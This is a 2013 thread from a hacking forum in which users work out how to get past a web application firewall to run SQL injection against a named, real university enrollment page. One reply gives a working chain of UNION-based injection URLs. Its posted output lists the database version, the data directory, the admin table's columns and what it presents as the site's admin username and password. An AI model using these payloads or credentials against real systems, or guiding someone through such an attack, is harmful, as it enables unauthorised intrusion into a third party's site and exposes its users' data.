Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to bypass this WAF?
Posted by: annen
Date: May 20, 2013 01:44AM

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+

5.5.17
but cann't get database() and version(),and cann't get column_name or table_name
I have tried many methords to bypass ,but it doesn't work!

Thanks for your kindness replay!

Options: ReplyQuote
Re: how to bypass this WAF?
Posted by: versus
Date: May 20, 2013 06:19PM

im not sure & im not so good in sqli, but i think isn't waf.

Options: ReplyQuote
Re: how to bypass this WAF?
Posted by: annen
Date: May 22, 2013 01:08AM

Thanks all the same!

Options: ReplyQuote
Re: how to bypass this WAF?
Posted by: hack2012
Date: June 02, 2013 02:47AM

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12--+

5.5.17

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12--+

redc

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,@@datadir,9,10,11,12--+

/var/lib/mysql/

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=%0a' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,table_NAME,9,10,11,12 frOm information_schema.tables where table_schema=database()--+

redc_admin

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=%0a' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,group_concat(column_NAME),9,10,11,12 frOm information_schema.columns where table_Name=0x726564635f61646d696e--+

adminid,username,password,title,firstname,lastname,email,address,phoneno,usertype,isactive

http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=%0a' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12 frOm redc_admin--+

admin:<ADMin!rEdC@2LuMs>

I am from China, For more WAF Bypass Please visit http://www.waitalone.cn/

http://www.waitalone.cn/tag/bypass



Edited 2 time(s). Last edit at 06/02/2013 02:50AM by hack2012.

Options: ReplyQuote


Sorry, only registered users may post in this forum.